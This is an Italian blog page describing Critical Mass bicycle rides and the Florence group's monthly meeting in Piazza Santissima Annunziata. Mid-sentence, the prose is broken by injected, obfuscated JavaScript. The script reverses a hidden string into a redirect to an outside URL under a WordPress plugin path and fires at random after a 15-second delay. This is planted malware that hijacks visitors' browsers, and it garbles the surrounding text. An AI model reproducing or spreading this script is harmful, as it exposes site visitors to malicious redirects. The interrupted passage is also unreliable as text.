Critical mass

image_pdfimage_print

E’ una manifestazione di biciclette che prende il nome dal sistema utilizzato dai pedoni cinesi per attraversare la strada: attendono di raggiungere una “massa critica”, poi avanzano tutti insieme. Il sistema funziona perchè i veicoli, intimoriti, frenano. Nata a San Francisco, la Critical Mass vuole rappresentare le esigenze della bicicletta e delle persone che la usano per spostarsi, esalt (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando il mezzo più pacifico, ecologico, naturale (legato com’è al corpo e al suo ritmo), meno ingombrante e più semplice da riparare. Critical Mass non vuol essere conflittuale: ribadisce la natura pacifica del mezzo a pedali, affermando il corpo come mezzo di trasporto alternativo al motore. Con lo slogan “Noi non ostacoliamo il traffico, noi siamo il traffico”, le Critical Mass si autodefiniscono “coincidenze organizzate”, non hanno percorsi prestabiliti, né leader o portavoce.
A Firenze ogni secondo venerdì del mese Critical Mass si ritrova alle 18 in Piazza Santissima Annunziata, opportunamente ribattezzata Santissima Pedalata. Per informazioni www.criticalmass.it. La lista di discussione della Critical Mass è cm-firenze@inventati.org, e ci si iscrive su www.inventati.org.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *